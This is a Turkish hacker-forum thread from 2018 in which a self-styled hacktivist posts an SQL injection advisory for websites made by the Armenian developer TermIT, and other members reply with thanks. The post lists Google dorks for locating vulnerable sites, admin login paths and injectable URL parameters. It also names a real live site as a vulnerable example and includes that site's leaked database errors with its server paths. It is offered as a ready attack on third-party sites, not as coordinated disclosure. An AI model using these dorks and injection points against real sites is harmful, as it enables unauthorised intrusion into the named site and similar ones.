Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Termit.Am Armenia Hosting SQL Injection Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2734
Mesaj Sayısı: 6280
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Termit.Am Armenia Hosting SQL Injection Vuln
05.10.2018 18:20
################################################################################​#################

# Exploit Title : Termit.Am Armenia Hosting Պատրաստեց TermIT ընկերությունը SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : termit.am
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Պատրաստեց TermIT ընկերությունը'' site:am
intext: © 2011 Developed by TermIT
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Admin Panel Login Path :

/admin/admin.php
/login

# SQL Injection Exploit :

/index.php?id=[ID-NUMBER]&lg=[SQL Injection]

/index.php?id=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site =>

hinstitute.am/index.php?id=51%27 => [ Proof of Concept ] => archive.is/kJf08

# SQL Database Error =>

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: The_ZiziL
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimiçi
Seviye Puanı: 35
Yaşam Puanı: 874 / 874
Deneyim: 97 / 100
Rep Sayısı: 547
Mesaj Sayısı: 1866
Üyelik Tarihi: 06.02.2017
     
Yorum: #2
RE: Termit.Am Armenia Hosting SQL Injection Vuln
05.10.2018 18:21
Teşekkürler, Emeğine Sağlık.

Allah’tan utanmayan insanlardan da utanmaz…
Alinti
Rep Verenler: KingSkrupellos
Mr-Spy
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 15 / 18
Deneyim: 73 / 100
Rep Sayısı: 2
Mesaj Sayısı: 8
Üyelik Tarihi: 08.10.2018
     
Yorum: #3
RE: Termit.Am Armenia Hosting SQL Injection Vuln
08.10.2018 12:11
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi